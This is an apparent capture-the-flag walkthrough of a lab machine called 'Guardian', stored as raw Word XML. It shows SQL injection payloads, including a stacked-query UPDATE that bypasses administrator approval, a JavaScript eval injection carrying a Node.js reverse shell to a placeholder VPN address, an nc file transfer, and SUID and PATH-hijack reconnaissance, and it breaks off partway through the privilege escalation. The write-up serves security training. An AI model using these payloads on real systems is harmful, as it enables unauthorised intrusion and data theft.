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GUARDIAN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9r8qes5ysxex"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20800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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the presence of port 80 hosting a web service and port 22 corresponding to SSH.</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5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web application, we identified a login page. After attempting authentication using default credentials and exploring via SQL Injection, we were unsuccessful. However, we identified an important point: the application allows new user registration through the option </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Register for first access"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6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identified another obstacle: to complete the registration, it is necessary to provide the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a company already registered in the application. Since we do not have this information, we can intercept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to carefully analyze the transmitted data, aiming to explore potential vulnerabilities.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6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the SQL Injection payload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">123456' or 1=1-- -, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the SQL query responsible for validating the provided EIN was manipulated. Since the condition </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is always true, the application returns all EIN records present in the database. In this way, we obtained a complete list of registered EINs. From this point, we can select one of these EINs to continue the registration process.</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5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in the application using the previously obtained EIN, we were unable to log in successfully. According to the return message, access depends on prior approval by an administrator.</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7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analyzing the application’s cookie, we noticed that no token was initially defined. However, upon intercepting the request, we verified that a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is returned in the response.</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000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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5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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"approved"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> property in the JWT payload, we observed that its value is set to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 (false). Based on this information, we can return to the SQL Injection exploitation to verify the existence of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"approved"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> column in the database, which may allow us to manipulate or better understand the user approval process.</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0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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begin our attack.</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will identify the number of columns in the current table.</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illustrated previously, there are four columns. The next step is to determine the name of the associated database.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8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database name (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">guardian</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) identified, the next step is to retrieve the names of the tables associated with this database.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83"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relevant table for our analysis at this moment is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"users"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now, we will list the columns associated with this table.</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5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that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users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table contains the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">approved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column. We can apply a technique known as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stacked queries</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to update the value of this column to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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. With this modification, we will be able to log in without requiring administrator approval.</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5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"EIN":"123456'; UPDATE users set approved = '1' where username = 'usertest'-- -"</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payload above, we set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">approved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column to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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the username is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usertest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is the user we created during registration. After doing this, we were able to log into the application.</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85900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Clicking on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Customers"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> link in the navigation bar redirects us to a page displaying the list of clients associated with the company </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BROKERAGE SOLUTIONS LTDA</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7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analyzing the application behavior on the Customers page, we observed that it makes two separate API calls. First, the application sends a request to retrieve company data. Then, it performs a second request to retrieve the list of clients associated with that company.</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7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7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Although we do not have access to the source code, we can infer that this call is potentially evaluated using the JavaScript function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a JavaScript function that executes code passed as a string. Therefore, if the payload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"db.getClients('56-7890123')"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is passed to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it would be executed as a call to the function </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.getClients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 the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'56-7890123'</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when attempting to pass the expression </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1+1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the value for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">action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(which would result in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">11</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when passed as a string and evaluated by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we received an error indicating that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">action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value is invalid. This suggests that the application may be using a whitelist to validate accepted values.</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6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by adding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+ 1+1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> after the function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db.getClients('56-7890123')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we are effectively concatenating </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1+1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the result of the function. The plus sign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causes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execute the code as an expression, resulting in the inclusion of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">11</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the end of the response. This demonstrates that part of the expression is being executed and confirms that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processing the provided input.</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6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insert a reverse shell payload to obtain remote access to the target server:</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process.mainModule.require('child_process').exec('/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1"')</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4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received the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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a76hfoe3jht"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460500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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40gjw5a85eh1" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to a fully interactive TTY:</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the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">guardian</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we obtained the first flag.</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0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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flag, we needed to escalate privileges to the root user. By executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm /4000 2&gt;/dev/null </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to list SUID binaries, we identified the binary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup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00400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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2004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939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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attempting to execute this binary, it requested a password.</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78"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did not know the password, we transferred the binary to our local machine and analyzed it using the reverse engineering tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ghidra</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for further investigation.</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On your local machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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nc -lvnp 4444 &gt; backup</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On the target machine:</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nc &lt;ip-vpn&gt; 4444 &lt; backup</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6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76"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binary on our machine, we opened it in Ghidra and navigated to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Functions &gt; main</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to examine its logic.</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80"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analysis, we identified a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Hijacking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability. The binary executes the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump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without specifying its full path, making it vulnerable. However, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
